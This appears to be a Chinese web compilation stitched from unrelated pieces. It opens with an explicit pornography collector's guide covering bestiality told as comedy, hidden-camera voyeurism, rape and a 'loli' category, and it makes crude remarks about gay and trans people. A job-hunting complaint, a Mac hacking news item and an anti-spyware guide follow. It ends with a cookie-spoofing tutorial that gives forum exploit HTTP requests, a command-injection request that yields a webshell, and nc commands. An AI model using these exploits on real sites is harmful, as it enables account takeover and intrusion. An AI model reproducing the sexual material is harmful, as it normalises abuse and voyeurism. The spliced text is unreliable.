订阅数:73485各国h片的大致情况
1、日本系
常见的有亚热(asian hot)、老虎(tiger eyes)、一本道、武士(summarui)、黑熊、FDD、99 bb、
a s i a n e y e s(亚细亚之瞳)等。
其中亚热有网友精心制作的目录,带图片的,文件大小、码率等十分详细,我就借此收集完整了全集(当时能见到的),清晰度自250
k至1024 k不等。
老虎的见过几十部片子的目录,似乎出于台湾人之手。
一本道好象有几百部,我不太感兴趣。有网友专门收集的,往往在
p2p软件上发言,列出所缺的几集的编号,放言谁提供了就拿所有珍藏来换,还注明只要 r m版的。其实流行的一本道的 r
m版清晰度有限,也就450 k左右,不如 a v i版的。
a s i a n e y e
s(亚细亚之瞳)是个另类的公司,片子制作精美,我收藏的有肛交的和人妖的。日本人内部的肛交片子很少见,这或许是东方人的特点决定的。
近来出现了一系列 d v d r i p格式的高清晰片子,反映了网络的进步。
2、韩国系
韩国的片子远不如日本的多,但留意的话也能收集不少。韩片易和日本片混淆,同是蒙古人种,语言也有点象。
3、大陆系
由于法律的限制,大陆的 h片创作很萧条,多为嫖娼偷拍或自拍,有所谓珠海系列等。我见过的最清晰的一部是老广嫖川妹的, m p
g,500多兆(也有 r m格式的,清晰度较差,不是善本,聊胜于无而已)。
4、港台系
港台系还是有不少片子,不太成系列(或许我孤陋寡闻)。常见的有豪情系列(可以认为是夜总会女郎的广告片)、性斗士系列等。
5、东南亚系
我只有一些零星的片子,难以细说。
6、欧美系
常见的有 p r i v a t e(片子大多制作精美)、 a n d r e w b l a k e、 m a r c d
o c e l、 n o r t h p o l e、 v i v i d、 v c a、 g g g、i n s e x(蜘蛛)、
h o t t i e d等。还有 b a n g b u s、 b a c k r o o m d o o r等小系列。
我对这些公司的渊源也并无太深的连接,一点感受是德国的片子比较另类。
二、h片的大致分类(未必科学,姑妄听之)
1、普通片子
不用多说了。
2、多人片子( g a n g b a n g)
最少的叫3P,可以多达数百人。以前有部1对361的, r
m格式,不太清楚。最近流行一部华裔女性亚裔郭盈恩连续与251位男子性交的片子,有两集(我只搞到1集半,如果谁有请做种,本人万分感谢),属于这一类的极品。
3、人体写真类
当然指完全裸露的,如 p l a y b o y和 p e n t h o u s
e的。a4y的艳舞系列也可归入。罗马尼亚裸体体操也算。
4、借助音乐、芭蕾等场景的 h片
这种片子的艺术性很高。
5、不同种族(interracial)性交的。
如黑白、黑黄、白黄,各种组合都有。可惜我还没有看到黄种男人与白种女人的片子,看来亚洲还是地位低啊。
6、自慰(mastrabute)系列
基本上是女性出演,看 h片的多为男性嘛。一般都借助工具(叫 d i l d o)。
7、同性恋(lesbian)系列
(1)女同性恋
(2)男同性恋(这种片子看着很不爽,大家应该都没有同性恋倾向,因此全删了。)
8、人妖系列
人妖嘛,本来是男人,注射雌性激素才变成这个样子。从近镜头观察,人妖尽管具备皮肤细腻、乳房丰满等女性特征,但与真正的女性相比还是粗糙。
人妖的片子自然只能肛交。人妖虽不能勃起,但也能射精,这一点出人意外。
9、乱伦系列
日本这类片子很多,其实不过是有年龄跨度的男女性交罢了。
这类片子的极至是片子可以出现80岁以上的人。(幼片另论)
10、强奸(rape)系列
我对这类片子很不感冒,因为基本上都是假的,若是纪实还可以的,但找纪实谈何容易?
11、孕妇( p r e g n a n t)系列
日本、欧美都有,可以满足好奇心。
12、偷拍(hidden camara)系列
做爱、排泄、洗澡、换衣服、裙底风光等。
随着偷拍技术的发展,这类片子日渐增多。
但这类片子大多不清晰,清晰的多是伪造的偷拍,很无聊。
轰动一时的美凤偷拍,由于摄像头离床太远,没拍到许多实质的内容。人们之所以趋之若骛,大概是要满足看漂亮的名女人做爱的好奇心吧。
13、拳交( f i s t)
将整个手插入阴道或肛门的片子。论坛上出现的德国片《妇科检查》就是一部这样的大片,其实哪里是什么大夫,凑点情节而已。
这是一种危险的性行为,易造成损伤,就是美国生活中也出现很少的。
这种片子的极至是(就我见过的而言):三只手同时插入肛门。
14、口交( o r a l)
极限是深喉口交( d e e p t h r o a t),我发布的 s l a p h a p p
y就是。这种行为往往造成女演员反胃乃至呕吐,但还不至于有太大伤害,算轻度的 s m。
15、肥胖( f a t)系列
多指胖女人,有重达300斤以上的,一种视觉刺激。
16、bukkake系列
就是颜面射精,往往多达数人乃至几百人。女演员的脸最终成什么样子可想而知。
17、公开场合系列
有裸露的(public)、做爱的。
18、 s m系列
s m是 s a d i s
m(萨德主义)的缩写,萨德是法国小说家,专门写性虐待的小说,作品长期被禁,近年解禁。论坛上的<<索多玛120天>>就是根据
s a d的小说改编的电影,内容压抑、恶心,但蕴含着深刻的思想。
s m的片子内容十分广泛,日本的绳缚系列、拷打系列,西方的蜘蛛系列、 h o t t i e d系列等有代表性。
s
m片子有玩真的、玩假的之分。玩假的只是做个样子,演员皮肉不会受苦。譬如说往身上滴蜡烛油看来十分恐怖,实际上多为特制的蜡烛,温度不高的。
玩真的就没边了,蜘蛛的片子还不算厉害,我见过的最恐怖的 s m片简直与真正的刑讯不相上下。
19、兽交
这种片子是受限制的,其受限程度仅次于幼片。动物的种类五花八门,最常见的
是狗,其次为马、牛、驴、猪等,甚至还有蛇、鱼(这两种严格说不算兽类)等。
这类片子等不了大雅之堂,多在简陋场所录制,清晰版极为难得。
值得一提的是,有些兽交片可以当喜剧片看,十分有趣,例如一部3个女人在猪圈里尝试与猪性交的片子,公猪十分亢奋,极力配合,但女演员忌惮猪蹄伤皮肤,最终草草了事。女演员自然没有遗憾(在肮脏的猪圈里与肮脏的猪有什么乐趣?商业行为而已。)。但猪显然比较遗憾。
20、幼片
幼片举世打击,在美国犯禁也要判重型的。
幼片严重违反人伦,不得传播,很多论坛也禁止发布的。
21、另类系列
其实上边许多种已经算另类了。我这里指极度另类的。
举几个例子:
(1)足恋
(2)体内异物:有将瘪篮球放进肛门再打满气的。
(3)与身高不足1米的侏儒做爱。
(4)生孩子、剖腹产、放环等医学主题。
(5)纯粹以互相射尿为主题的片子。
(6)围绕人乳的挤奶、喝奶等片子。
(7)突出人体的某些特点或功能的,如似阳具的大阴蒂、多对乳房、射精量超常数备等。
(8)女尸法医鉴定乃至解剖等。
数不胜数。
这类片子有些十分有趣,可以当喜剧看。但有些就不这样,需要超常的心理素质。楼主也不时有落荒而逃的时候。
楼主收集或发布某些片子,并不代表酷爱这类片子或喜欢这种行为,作为研究聊备一格而已。
以上罗索这么多,不对的地方请高手指正。
二、看 h片的心理准备
饮食男女,人之大欲存焉。作为一个体魄正常的男性,看 h片是完全正常的事情,不必自惭形秽。
凡是男人,假如事先知道不会被警方或老婆擒获,不会染病,不会被要挟,不会被示众,不会破产,不会丢饭碗,总之没有如何危险,我想99%都会去嫖妓的,哈哈。
但凡事皆有度,社会现状决定了性行为目前仍然是一种隐私行为,因此看 h片也不能大张旗鼓。
我国的法律在这方面的约束逐渐松动,前段时间一对看黄碟的夫妇胜诉就说明了这一点。作为人的权利逐渐扩大。可以预见
h片前景看好。
再次要说说“变态”的问题。所谓“变态”是沉溺于某种事务脱不了身,譬如有人只有偷女性内衣才能得到性满足,其他的方式都不行,这叫“变态”。
至于普通人,潜意识里都有不同程度的变态倾向(包括窥淫、乱伦、虐待等),之所以为正常人,就是这种倾向可以有意识地进行控制,不至于发作或者频繁发作。
三、 h片的来源
1、购买外部片源
比较原始的方式了。
2、网络获取。
方式多种多样。
(1)专业成人网站。不过多为收费的,有人服费,有人破解,有人望洋兴叹。
(2)p2p软件。
b t,目前最流行的,是革命性的突破。
p p点点通,也是不错的,我前一段时间还用,有时候一晚上能下载10G以上。
i m a s h,国外的,也是不错的,就是速度慢。
其他象电驴、 r l等用着不爽,浅尝辄止。
(3) ftp
这个我不缺少研究。
如果懂一些专业英语(指 h片专业),找片子会如虎添翼,我有意识地在上文加了一些英文。这门槛不深,几十个单词就入门。
既然有心看av,要挑嘛,第一个当然就是要看人
首先参考的数据是是VIDEOBOY的杂志排名
虽然毕竟是日本那里的排行,和台湾的口味不一样,不过还是有一定的公信力
可以拿来当作参考,能够排到前十名的都可以算是实力派的AV女优
这个恕版规无法提供网站连结,自己去YAHOO JP搜寻
而如果要纯粹网站的排名的话
V.SHOCK,XCITY和avgirls.net的排名可以拿来参考
此外一些贩卖av的网站也有排名可以当成拍片的依据
要看专门的AV讨论志的话,VIDEOBOY,BESTVIDEO和DVDPERFECT是专门的AV讨论志
BEJEAN的话算是比较综合性质的写真杂志
而URECCO和BEPPIN SCHOOL的话....那个算是专门的写真杂志了说
至于台湾的AV论坛的话
比较有名的除了文末的BBS讨论区外,其它都是无料或是BT讨论网站
去那里看看可以增进知识,不过每个人都有每个人的口味
太常去反而会失去自己的口味
接着来看女优类型
巨乳系的话,VIDEOBOY排名前十名的有一半以上都是属于F CUP等级的
另外以巨乳著名的则有大浦安娜,熏樱子,白鸟さくら,樱朱音,舞冈结希,星川光等等
清纯派的话,首要推荐就是高树玛莉亚,2003年日本票选唯一五颗星AV女优
接着下来能推的就是古都ひかる,苍井そら,美竹凉子,小沢菜穂和萩原舞等等
罗莉向的话,第一名大概就是堤莎也佳
另外小仓杏,小仓ありす(小仓艾利丝),月野しずく,秋月杏奈等也都可以看
喜欢痴女的话,三上翔子(目前改行当AV监督去了)和朝河兰是最佳选择
而他们的后辈像立花里子,宫下杏菜,姬川丽和芹泽直美也都是蛮有名的痴女系
要熟女的话,紫彩乃,赤坂ルナ和麻布レオナ熟女三大天后是入门(不过都超过30了说)
其它像是友田真希,小池绘美子,友崎亚希,MAYUKA等也值得一看
要高挑美腿的话,绫乃梓,鸟越乃亚(现名NOA)和浅见怜就拿下来吧,立花里子也不赖
想找大姐姐的话,松岛枫是不二人选
其它像泷泽优奈,水元ゆうな,穗花,nana,中川瞳能收就收
纯粹想要搞菊花的话
曾经来台湾拍过啤酒广告,目前是AV女优后庭次数第一的南波杏是不二选择
要想听叫声的话,小泽圆,白石瞳,萩原舞会让人听到茫苏苏....
要看明星脸的话,唯川纯(林志玲),松嶋菜菜(松嶋菜菜子),今野由爱(滨崎步),
坂下麻衣(侯佩岑)可以拿来玩超级比一比
只要纯无码的话,及川奈央,白石ひより,樱田さくら和葵实这几位的产量都很多
纯粹看AV男优的话,加藤鹰,南佳也,巧克力向井(现役摔角手,特技是火车便当固)和
MICKY柳井(外号THE HELICOPTER MAN,特技就是直升机)一定要认识
再来提到选片的一些技巧
第一个看系列
较长卖的系列,例如MAX COFE,女教师狩猎,不法侵乳,超高级泰国浴女郎,ANGEL系列
,猥亵系列,制服人形,DIGITAL MOSAIC系列等等都是票房保证
另外比较重口味的像是极乱/极本番系列,志摩紫光SM调教系列,死夜恶系列,痴汉系列
,人间废业系列,四时间系列对于口味比较重的来说可以拿来选择
一些比较常见的系列
新人第一作的话强力推荐"处女宫"系列
素人的话就是AURORA PROJECT
角色扮演的话就以ANGEL系列,MAX COFE系列和制服人形系列较出名
比较淫乱的话,催眠系列,极乱系列,极本番系列都是值得一看的系列作
要SM调教的话,志摩紫光SM调教系列和龙缚爱玩调教系列算是出名的作品系列
话题性的东西也常是票房保证
例如全裸系列(全裸和太鼓,全裸芭蕾,全裸体育选手权,全裸中国杂技团等等)
因为人难找,做出来都是高成本高回收
另一种就是AV女优竞技系列(像是全裸马拉松,全裸相扑,全裸水中运动会等等)
这个成本较上面那种少,话题性也够,要找人也不难,一堆小牌AV女优排队等着选
但是缺点就是质量参差不齐,偶而还会看到哥吉拉级的....
改编的东西也常是题材之一
电影的,像追杀比尔,霹雳娇娃,极道之女
电视剧的,像白色巨塔,魔女的条件,鬼之栖家
游戏的,像零红蝶,FFX
漫画的,像玛莉亚的凝望,银河铁道999,网球甜心
音乐的,像女子十二乐坊
AV特摄的,像爆乳战队,超光辉士
上述这类型的当然都是以搭原作的市场话题顺风车为导向
只要话题炒热了,就不怕没钱赚
有些特殊类型的片子也是焦点
例如交互式AV和VR FUCK系列
因为制作DVD片子的成本高(拍起来的成本倒是比一般片子低)
在日本很难看的到
西洋的倒是一堆交互式AV
第二个看公司
大手公司像是MOODYZ,SOFT OF DEMAND,ATTACKERS,I ENERGY这些大手出片量多
也敢出话题性的作品(像全裸中国杂技团)
比较小一点的像忠实堂,桃太郎映像出版,マルクス兄弟,ACTIVE 1,MAX A等等的
不是靠重口味(像最近刚出的樱田SAKURA母子号泣乱交)
就是靠广告牌娘(像夏目NANA)来在这市场分一杯羹
专门作出租片的像芳友社(h.m.p)则就纯粹靠口碑了,所以这家的片子质量不错
另外近期出来的新公司S1和REALWORKS
这两家标榜超薄码,而且挖了一堆知名的av女优当广告牌娘
(像苍井,樱朱音,nao,小泽菜穗....等等)
所以也相当值得注目
上述公司有些有专门的电子报和有料无料片段
同样的依站规只提供情报,路请自己找,恕不响应
第三个看监督
好监督可以把一个看起来不怎么样的AV女优拍到红
不好的监督就常常沦为封面杀手
这个业界中比较棒的就属长崎南(少数女性监督),二村ヒトシ和溜池通口
话题性的话则属志摩紫光,川崎军二和甲斐正明为首
最后就是看封面
除非你对这个女优或者是这个系列有相当程度的认知
不然封面封底拍的越漂亮(尤其是拍到像艺术沙龙照那种),踩到地雷的可能性越大
讲个例子,古都光的片子封面封底都打光或修到脸上的三颗痣都看不到.....
如果你实在都不知道该怎么选,没关系
大手公司一段时间都会出精选集
像DEEPS和h.m.p的精选集,四个小时让你看半年份的片子精华
而且价格又便宜(不到1000日圆),可以作为类型的挑选标准
日本的片子以DVD为大宗
所以入手收藏的话当然以DVD为主
但是日本的片子有分成出租版和贩卖版
当然出租版的片长较短
贩卖版则绝大多数有附DVD特点映像
不过如果要收原版片的话
建议直接杀到日本收一片日币三四千的就OK了,而且还是全区片
不知道有啥管道的话
P2P或者一些作平行对烧压片的店家(不管实体非实体)可以考虑
只不过质量请自行评估,敝人恕不提供
最重要的是看的人是你不是别人
自己的眼光才是最重要的
所以片子看的越多对自己的鉴赏能力帮助越大
引发我的困惑的起因是:最近我辞职了,因此想找份新工作,由于自己本身是IT出身(别笑我),加上常年不写字(书还是尽常读的),于是就上网找工作,然而近来的一系列事,让对网上招聘感到困惑!
其一:有多少企业是真的在招聘?
每天我都看到一大堆一大堆的招聘信息,自己由于做过软件开发、ISO管理、信息主管、客户经理四种工作,自我感觉良好(事实上可能我的工作经历可能给人力资源主管造成不快:你啥都会干,能不能干好一样呢?这个问题怎么解释都是白搭,反正我都干得足够好,也都努力了并获得承认了!),于是一份一份的简历发了出去,却都是石沉大海,无影无踪!
统计我投的简历数字前后加起来有近百封,得到回应的仅仅是2份,是自己的简历写得差劲么?然而我与其他求职同仁的简历做了一个比较后得出结论:简历是没什么问题的。余下的原因只有一个:企业倒底是否在招人?再深化一下,网上招聘到底有多少是真实的?
我看了很多公司从今年1月份一直招到现在,比如某某粮油公司、某某投资公司等等,招聘职位也就是那么几个,一开始认为这些公司没有找到合适的人或很少有人投简历过去,于是投了简历并抱了一丝希望(仅仅是得到面试机会的希望)等待,当然同时也在给其他公司发送简历,但是,十天过去了手机仍然在沉默着,我想可能是人家忘记了,再上网查看该职位信息,发现仍在招聘,于是再投一份简历,有的公司估计可能事务太多的,就索性多投了几份过去,但还是如同扔了一份沙子进了大海,没有任何回应!
这种情况让我措手不及,因为我初到深圳时情况并非如此,一般投五份简历肯定有一两家公司通知去面试,如果造成现在状况的原因是经济不景气的话,为什么会有比当年更多的职位需求呢?我觉得这个理由太牵强了,我追求的职业并非是高薪职业而是有用我之处的职业!
相信有很多求职者都有与我相同的感受,都想问同样的一个问题:“为什么没有人理我?”,这种问题我也问过了,但现在我不会再反省这类问题了,我只有怀疑网上招聘的真实的唯一理由给自己宽心!
我做过电子商务,知道网络营销中有一种广告手法就是采用发布网络招聘信息的方法吸引人们注意,近而建立起潜在知“名”企业基础,如何配合外部软性策划或硬广告措施,则可以获得市场的认识度!
但我对这种种花得叶的操作手法存在异议,认识度并不等于认可度,认可度是正面的,认识度是中性的。如果为了宣传企业或产品而在网上搞假招聘,可能是自种恶果!因为这是一种不公平的欺骗手法,虽然前年没人知道,去年也没人知道,今明后年可能也不会有人知道,但事实上造成恶果的原因并非是因为欺骇本身,而是对招聘人才这一工作的严肃性的破坏,更重要的是对企业在公众(姑且称求职人员为公众吧)心目会大大降格。做过市场的人都知道,企业与客户之间并非是单纯的买卖关系,两者之间存在微妙关系,认可是双向的,拒绝同样提双向的。说了这么多话,我的目的仅仅为了证明一个观点:假招聘给企业带来的并非真的甜果,很可能是一粒苦果,沉默就表示拒绝,你拒绝或无礼于可能的客户,客户一样会回敬于你的!从另外一方面来说,这跟你邮箱里的垃圾邮件在本质上是一样的!
其二,问题并非单纯是企业的问题,招聘网站同样存在疑点:
假设招聘网站为了提高人气而重复发布招聘信息的话,在一定条件下情有可原,但如果出现把一个月以前甚至一年以前的信息拿出来重复发布的话,那就令人厌恶了,即使经过企业认可但没有确认企业存在人力需求而重复发布的话,尽管并不违法,但毕竟是不道德的,有失诚信的。
如果招聘网没有去挖掘企业需要和个人需求,仅仅在招聘信息上玩虚的话,这种网站还是不要再浪费时间为好,其结局已经注定不是一个好结局!
其三,其他问题。
首先请大家别骂我多管闲事,我当然是闲着没事干才提出自己的看法的,目的不在于吸引眼球或板砖,而在于以正视听,这可不是闲事,是全社会的人都应该做的事!
其次,
大家说大多数是真实的,只有极个别的是假的。直假数量方面招聘网站自己心中最清楚,我只能看到表象,不能拿到任何证据,但在我的感觉中:有近半数的招聘是假的!
最后,诚信的社会或诚信的网络经济需要大家的共同维护,上述并不针对任何一家网站!
最最后,希望大家好运!
据外电报道,2月份,瑞典一位苹果机发烧友将其服务器作为目标,邀请“天下高手”对Mac OS X操作系统进行攻击。据“优胜者”称,他使用一个尚未公开的漏洞,在“20到30分钟”内即获得了管理员权限。
2月22日,瑞典一位“好事者”将其Mac Mini机当作服务器,邀请黑客攻入这台机器,并获得管理员权限。证明黑客挑战成功的是他可以在机器内删除文件,并安装程序。这位“好事者”随后把消息和IP地址公布在一个网站上。
消息传出,很多黑客前来一试。不过挑战6个小时就结束了——已经有人成功攻入了Mac OS X操作系统。
这位“优胜者”在接受ZDNet采访时把自己称作Gwerdna。他说,这台充当服务器的Mac Mini已经被很好的加固过,但他使用了一个苹果尚未公开的漏洞,用20到30分钟的时间攻入了系统。
Gwerdna认为,在Mac OS
X上,有很多的漏洞尚未被苹果正式宣布,它们都可以被黑客所利用。在系统攻击难度和漏洞数量上,Gwerdna表示Mac OS
X只是“小菜一碟”。
流氓软件带有“不请自来”的性质,且具备随机弹出广告、收集用户个人信息、拖慢计算机性能等特征。在国外流氓软件也叫 Badware 或Spyware 。
据一份网络调查显示,高达99 %的网友受到过流氓软件侵袭,其中,半数以上的计算机用户没有成功卸载过流氓软件。
本文提供多个解决方案,教你彻底清除流氓软件,并对之加以有效的预防。希望对您有所帮助。
一、用最简单的查杀工具追击流氓软件
间谍软件查杀工具的使用方法大都雷同,为了便于操作,很多工具都以简洁的界面来为用户提供快速反应能力。以 Spyware Terminator 为例,这是一款来自国外的流氓软件查杀工具,它的界面与微软的Windows Defender 很像,很容易上手。从下图中您可以看出它的作用。
安装一些插件程序时Spyware Terminator 会给出提示( 如图1) 。从图中可以看出,这是一个IE 的工具条软件。此时按下Block 将不能继续安装。还可以点击Show details 看出该流氓软件在硬盘中的位置、大小等信息。
图1
安装一些插件程序时Spyware Terminator
会给出提示
按下Allow 之后的提示(如图2 ),从图中可看出该工具条的进一步动作,BHO 即Browser Helper Objects (浏览器辅助对象)。
图2
按下Allow
之后的提示
再次按下Allow ,未定义的DLL 文件写入系统目录时,Spyware Terminator 所给出的提示。
图3 Spyware
Terminator
所给出的提示
对于国内的流氓软件,我们推荐以下工具(中文推荐部分)。
常见的反流氓软件工具有:
英文推荐:
Spyware Terminator: http://down1.tech.sina.com.cn/download/downContent/2006-01-18/16931.shtml
ZoneAlarm Anti-Spyware: http://down1.tech.sina.com.cn/download/downContent/2005-10-20/15665.shtml
Windows Defender:
http://down1.tech.sina.com.cn/download/downContent/2004-11-25/12212.shtml
Arovax AntiSpyware: http://down1.tech.sina.com.cn/download/downContent/2005-11-16/16125.shtml
中文推荐:
恶意软件清理助手 http://down1.tech.sina.com.cn/download/downContent/2005-09-02/14958.shtml
UPIEA http://down1.tech.sina.com.cn/download/downContent/2004-03-16/5337.shtml
Guardio( 全能优化) http://down1.tech.sina.com.cn/download/downContent/2005-09-16/15194.shtml
二、手工查杀、清除卸载后的残余垃圾
随着国内反流氓软件的呼声日益高涨,一些原本恶意强制捆绑软件也逐渐“从良”。但是,仍有一些恶意插件设置陷井来侵袭我们的计算机。下面举例说明如何彻底根除这类流氓软件。
1
、第一步,用流氓软件的“卸载”功能来删除流氓软件本身,
通常这一过程只需要几秒钟,会要求你重新启动计算机。
2 、重启计算机后,打开控制面板-添加删除程序,看看是否还有陌生的程序名称?
图5
需要再次手工删除
3 、去Program Files 文件夹中,检查一下有没有漏掉的文件或文件夹。点选“修改日期”标签,按日期排序,选中最新的文件夹,按住 Shift+Del 键,彻底删除。
图6 彻底删除
总结
流氓软件的特征一直在变,花样在不断翻新,做为最终用户,应该不断提高警惕和安全防范意识,安装软件之前,要看清楚软件的 Eula 协议和安装选项,不要盲目地点击“下一步”。
最近网上流行web脚本入侵。常用的入侵方法有两个,一个是Sql
Injection(是一个描述将SQL代码传递到一个并不被开发人员所想要的应用程序中去的专业术语),另一个就是利用web脚本中对cookie变量过滤不严来入侵。那么什么是cookie呢?简单的说就是Web页服务器用来记录你的信息,
置于您硬盘上的一个非常小的文本文件。具体点说如果是98那么它们默认存放在drive:\windows\cookies目录下,如果是2k它们在drive:\Documents
and
Settings\%你的用户名%\Cookies目录下(每个文件都不会超过4KB)。它们的文件名格式为:你的用户名@产生的COOKIE的网页文件所在的WEB目录[COOKIE改变的次数].txt。具体的例子就像这个文件:
iwam_system@cookie[3].txt。这里我只谈与cookie有关的三个入侵工具。
一个是cookie的嗅探工具。网友PsKey最近写了一篇<<动网论坛(DVBBS)存在严重漏洞>>的文章。文章大意是由
www.aspsky.net开发和维护的源代码开放的DVBBS6.0论坛由于其tongji.asp文件没有过滤用户提交传递给SQL查询的输入,导致远程攻击者可以利用这个漏洞进行SQL注入攻击。在dbvvs6.o的sql版可以直接在服务器主机上添加管理员用户,在dbvvs6.o的acess版提交特殊url可以得到论坛里所有用户的cookie数据,进而威胁论坛或服务器安全。原文你可以在安全焦点网站(
http://www.xfocus.net)看到。
文章里有一段写到"看看管理员操作论坛时到底需要些什么,举个例子,删帖子的时候:
POST /asp/dvbbs/admin_postings.asp?action=delet HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword, application/x-shockwave-flash, */*
Referer: http://www.target.com/asp/dvbbs/admin_postings.asp?action=删除主题&BoardID=2&ID=2
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET
CLR 1.0.3705)
Host: target.com
Content-Length: 124
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
aspsky=userhidden=2&password=18e071ccfb2d1c99&userid=1&userclass=%B9%DC%C0%ED%D4%B1&username=admin&usercookies=0;
iscookies=0; BoardList=BoardID=Show;
ASPSESSIONIDAASCSCDC=IPKLMGFAKFJLMOLNMMEMFDGC; upNum=0
title=%B9%E0%CB%AE&content=&doWealth=-7&douserCP=-5&douserEP=-5&id=2&replyid=&boardid=2&msg=&submit=%C8%B7%C8%CF%B2%D9%D7%F7
"
这些数据就是管理员在删贴子的时与动网主机的通讯数据。很多菜鸟看到这里就不明白了,pskey是如何得到这些数据的呢?特别是最后一大段的cookie数据是怎样探测到的?pskey用的什么工具我不得而知,但我介绍的WinSock
Expert这个小工具也可以邦我们探测到这些数据。它是国人董雪强编写的一个用来监视和修改网络发送和接收数据的程序,但遗憾的却是一个英文版本。不过使用方法是很简单的。举个例子,我来登陆我在本机上架设的动网论坛,图1.jpg。
我选择的是cookie保存一天,看看WinSock Expert会嗅探到什么数据呢?此时打开WinSock
Expert,图2.jpg,
点打开图标在弹出窗口的菜单里找到动网的登陆页面,图3.jpg,
点ope进行监听。然后我登陆动网论坛,登陆完毕后,再看看WinSock
Expert帮我在本机接收到那些cookie数据呢?图4.jpg。
看到了没有,我们接收到了和pskey在文章中提到的类似数据,里边包含了cookie的各项值。当然用这个工具,你不但可以监听发送和接收的cookie,还可以用来帮助您调试网络应用程序,分析网络程序的通信协议(如分析OICQ的发送接收数据),并且在必要的时候能够修改发送的数据。这些功能在软件的帮助里都有简单说明。
第二个是cookie的发送工具。还是先看网友pskey的一篇<<LB5K论坛remmail.cgi存在认证和过滤不严漏洞>>文章吧。原文你也可以安全焦点看到。文章提到LB是一款由
www.leoboard.com开发和维护的源代码开放的cgi论坛;由于remmail.cgi存在认证和过滤不严漏洞,可能导致非法用户控制论坛或以web权限在系统上执行任意命令。攻击方法:如果对方w2k系统采用的是”perl.exe
%s %s”映射方式很容易搞定,发送如下求就可以了得到一个网页shell了:
GET /perl/lb5000mx/cgi-bin/remmail.cgi?member=system%20%40ARGV
HTTP/1.1
Host: target.com
Cookie: amembernamecookie=system%20%40ARGV
菜鸟又不明白了,这些数据我如何发送呢?一开始我也不会,还用vb编写了一个小软件来发送这些数据。后来在几个论坛上问了高手,学到了一个cookie的发送方法。工具就是用瑞士军刀nc.exe,方法是依次提交以下几行类似的数据:
nc -vv www.target.com 80
get /xxx/xxx.cgi?xxx=xxx HTTP/1.1
host:www.target.com
cookie:xxxxx=xxxxx
看我在本机做的实验,图5
这是用nc提交cookie的方法。
图6
这是得到了一个webshell。
注意的是,用w2k自带的telnet工具也可以做到,方法和nc.exe一样,不过我发现用telnet不太容易控制字符输入。
第三个cookie的管理工具,iecookiesview。看名字就明白它是用来做什么的吧。先看一下我用记事本打开刚才本机登陆动网论坛留下的cookie文件,它是放在我硬盘c:\Documents
and Settings\administrator\Cookies目录下,文件名是administrator@dvbbs6[1].txt,内容如下:
aspsky
userid=1&usercookies=1&userhidden=2&password=469e80d32c0559f8&userclass=%B9%DC%C0%ED%D4%B1&username=admin
192.168.1.3/asp/dvbbs6/ 0 1896775680 29244795 3943711152 29244638
*
啊,这样好多地方看不明白,还有一些乱码。我们用iecookiesview打开来看看。图7。
从图中我们很清楚看到这个动网产生的cookie的各项值的意思了。key是cookie的关键字,value是cookie的值,domain是cookie来的网域,expire是cookie的过效期,modified是cookie的产生时间(:-)不好意思,我的电时间都是1999年),secure是安全的意思,它的值一般都是no。通过这个工具,我们可以清清楚楚知道这些cookie的表示意思了,并且它还自动将汉字产生的url编码cookie又转换成了汉字。上边用记事本打开看到的乱码%B9%DC%C0%ED%D4%B1,现在我们明白了它就是三个汉字管理员。
iecookiesview最大的一个好处是可以轻松修改cookie,因为我们可以看的懂。像某个动网论坛你无论是利用pskey提到的漏洞,还中利用跨站或其它的手段,得到管理员的cookie了。然后你可以先用普通用户登陆论坛在本机产生一个cookie,再打开iecookiesview编辑你的普通用户的cookie,像图8。
用管理员的各项cookie值对应修改普通用户各项cookie值后,点modify cookies就可以变成管理员的cookie了。此时你再打开ie重新登陆该动网论坛,你就会变成该论坛管理员。
下边,我再用这nc.exe和WinSock
Expert这两个工具简单的来进行一次cookie欺骗操作演示,进一步说明我介绍的cookie三剑客工具的用法。我这儿写了一个简单的asp脚本level.asp,源码和源码简单说明如下:
<%response.write now()%>
<%response.write "<br>"%>
<%response.write
"<html><script>document.write(documents.cookie);</script></html>"%>
'说明:以上代码产生level.asp这个网页的cookie值
<% if Request.Cookies("level")<>"" then
response.write
"<html><script>document.write(documents.cookie);</script></html>"
if request.cookies("level")="user" then
response.write "<html><script>alert('you are a
user');</script></html>"
'说明:如果cookie的变量level值为user的话,弹出对话框you are a user
else
if request.cookies("level")="admin" then
response.write "<html><script>alert('you are
administrator!');</script></html>"
set fso1=server.createobject("scripting.filesystemobject")
set fil=fso1.opentextfile(server.mappath("lcx.txt"),8,true)
fil.writeline "you are admin!"
'说明:如果cookie的变量level值为admin的话,弹出对话框you are
administrator!并在level.asp同目录下生成lcx.txt,内容是you are admin!
end if
end if
else
response.write
"<html><script>alert('你没有cookie值');</script></html>"
end if%>
'说明:如果cookie的变量level没有收到这user和admin的值,那么弹出对话框你没有cookie值
现在我们执行level.asp,cookie的变量level并没有收到这user和admin的值,看看会发生什么。图9。
。如果我们将<%response.cookies("level")="user"%>这行代码的插的第三行后,再次运行这个level.asp脚本的时候,它会自动产生cookie的变量level值设为user,看结果,图10.jpg。
此时我们通过WinSock Expert抓数据,图11.jpg。
我们抓得下列cookie数据:
cookie:iscookies=0; BoardList=BoardID=Show; level=user;
ASPSESSIONIDQGGGQSLC=NOIBEOPACLBOJFLGFLEDICNHiscookies=0;
BoardList=BoardID=Show; level=user;
ASPSESSIONIDQGGGQSLC=NOIBEOPACLBOJFLGFLEDICNH
现在我们要做的就是欺骗level.asp,让它以为我们提交cookie的值为admin,这样会在level.asp同目录下生成lcx.txt。分析源代码得知,只要我们提交cookie的变量level值为admin,就可以达到我们想要的结果了。我们将WinSock
Expert抓的数据改一下,改成:
cookie:iscookies=0; BoardList=BoardID=Show; level=admin;
注意改成admin了
ASPSESSIONIDQGGGQSLC=NOIBEOPACLBOJFLGFLEDICNHiscookies=0;
BoardList=BoardID=Show; level=admin;注意改成admin了
ASPSESSIONIDQGGGQSLC=NOIBEOPACLBOJFLGFLEDICNH
现在我们用nc来提交cookie值,骗过level.asp.图12.jpg。
仔细看图11,最下边有一行alert('you are
administrator'),这说明,我们成功了。果然在level.asp同目录下生成了lcx.txt,内容是you are
admin!
